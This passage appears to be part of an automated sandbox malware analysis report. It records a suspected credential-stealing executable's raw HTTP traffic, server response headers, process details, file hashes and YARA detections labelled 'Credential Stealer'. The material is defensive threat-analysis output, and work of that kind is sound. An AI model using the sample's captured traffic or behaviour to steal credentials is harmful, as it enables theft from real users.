                                                                        2024-10-30 05:16:09 UTC15331OUTData Raw: ca 10 e8 6e a8 20 dc 16 9c 5b 84 71 41 7c 00 5a 5e 35 4c b0 53 e2 0c eb e7 2a 54 97 55 01 b4 42 39 0f b1 cd db 69 1b b8 76 ac b3 79 b3 e0 38 dd 67 dd ab bc cb 99 a2 17 ae 6f 4a b9 d2 65 d2 2c 0a 30 4d 4a b5 35 fa 0a 8a 73 db 66 bb d9 1c 19 3e 77 4c 08 1c 28 8e b9 50 5e b8 28 2b 8c 3a 59 e4 91 db 2f ec da e0 23 bd 57 b4 cd 77 76 58 a0 e6 02 cf 8b 88 80 d9 31 38 f8 6d 0c da 03 0e bb 4e ba ac f4 f1 a0 a8 ab 51 b5 69 dc 1a 4f 76 7d 80 46 46 ba 93 d9 6d eb 21 e7 a3 2a 92 f3 f5 c4 89 d7 3e a1 d4 bd bb 8e bd 7d d8 fa bd b2 f1 33 f7 d7 72 bd af fd fa 8b d7 8a 9e 12 56 e7 31 ab 79 b9 95 3b c9 23 73 5c 3f 87 16 b5 52 f6 b4 21 6d 34 6f 91 c3 da 54 6d b1 35 20 ae 2e b8 f1 8d b3 a4 87 06 dd f8 dd 48 32 e1 ea c1 fb c9 43 1d 53 85 17 c0 aa 12 2b 95 db 1c f6 23 7d 64 4a
                                                                        Data Ascii: n [qA|Z^5LS*TUB9ivy8goJe,0MJ5sf>wL(P^(+:Y/#WwvX18mNQiOv}FFm!*>}3rV1y;#s\?R!m4oTm5 .H2CS+#}dJ
                                                                        2024-10-30 05:16:10 UTC1025INHTTP/1.1 200 OK
                                                                        Date: Wed, 30 Oct 2024 05:16:10 GMT
                                                                        Content-Type: text/html; charset=UTF-8
                                                                        Transfer-Encoding: chunked
                                                                        Connection: close
                                                                        Set-Cookie: PHPSESSID=spllms35hk6ui49rq4md005tn4; expires=Sat, 22 Feb 2025 23:02:49 GMT; Max-Age=9999999; path=/
                                                                        Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                        Cache-Control: no-store, no-cache, must-revalidate
                                                                        Pragma: no-cache
                                                                        cf-cache-status: DYNAMIC
                                                                        vary: accept-encoding
                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=kOAfp%2Bs%2BfO45TlOXFnfK8kPLaBspbM5pBTOaT8GbdWS2nWmv4vNYqC%2BA6pFWYhoRbtlTlKizS7k5y%2FP3LXvr1y4AFrEmlf6rBiY1oiX4%2FHvpwDGv5k1wuDoFPlSbWHsiTZxUyMM%3D"}],"group":"cf-nel","max_age":604800}
                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                        Server: cloudflare
                                                                        CF-RAY: 8da8ee7dbb36839f-DFW
                                                                        alt-svc: h3=":443"; ma=86400
                                                                        server-timing: cfL4;desc="?proto=TCP&rtt=1518&sent=228&recv=634&lost=0&retrans=0&sent_bytes=2846&recv_bytes=588215&delivery_rate=1844585&cwnd=252&unsent_bytes=0&cid=6f1c0e80be58632f&ts=1804&x=0"


                                                                        Target ID:0
                                                                        Start time:01:15:57
                                                                        Start date:30/10/2024
                                                                        Path:C:\Users\user\Desktop\file.exe
                                                                        Wow64 process (32bit):true
                                                                        Commandline:"C:\Users\user\Desktop\file.exe"
                                                                        Imagebase:0x20000
                                                                        File size:2'975'744 bytes
                                                                        MD5 hash:263307CBC603BEF82F9365CC2FD70B46
                                                                        Has elevated privileges:true
                                                                        Has administrator privileges:true
                                                                        Programmed in:C, C++ or other language
                                                                        Yara matches:
                                                                        • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000003.2089349102.0000000001646000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                        • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000003.2089206820.0000000001642000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                        Reputation:low
                                                                        Has exited:true

                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000003.2100374761.0000000001637000.00000004.00000020.00020000.00000000.sdmp, Offset: 01632000, based on PE: false
                                                                          • Associated: 00000000.00000003.2129107930.0000000001632000.00000004.00000020.00020000.00000000.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_3_1637000_file.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 0697271c4fc967d44b80bb5d26a1ee6942c5b900e3997719122403d77bdf4052
                                                                          • Instruction ID: d446bc3913869c22f495beeb6e1e4eabdde1d42464f3d7fb896bd547a4962f90
                                                                          • Opcode Fuzzy Hash: 0697271c4fc967d44b80bb5d26a1ee6942c5b900e3997719122403d77bdf4052
                                                                          • Instruction Fuzzy Hash: 6B81307600A7C19FC717CF38DDA6586BFB4BE53220B1C46CAD8814F1A3D361A61AC796
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000003.2100374761.0000000001637000.00000004.00000020.00020000.00000000.sdmp, Offset: 01632000, based on PE: false
                                                                          • Associated: 00000000.00000003.2129107930.0000000001632000.00000004.00000020.00020000.00000000.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_3_1637000_file.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: e1bbbe37d016a95bdcf4c3a594b3bdc41721cf6e6a8eeef9e400af77c5c6e964
                                                                          • Instruction ID: c2204e451d54bd2e6429f9aa0ff1dec8fee72674650611dcc974ea3e454d7c9d
                                                                          • Opcode Fuzzy Hash: e1bbbe37d016a95bdcf4c3a594b3bdc41721cf6e6a8eeef9e400af77c5c6e964
                                                                          • Instruction Fuzzy Hash: 6151313600A3C49BCB17CF34D9955CABFA4BE57320B2849DAD4810F123D661A659C796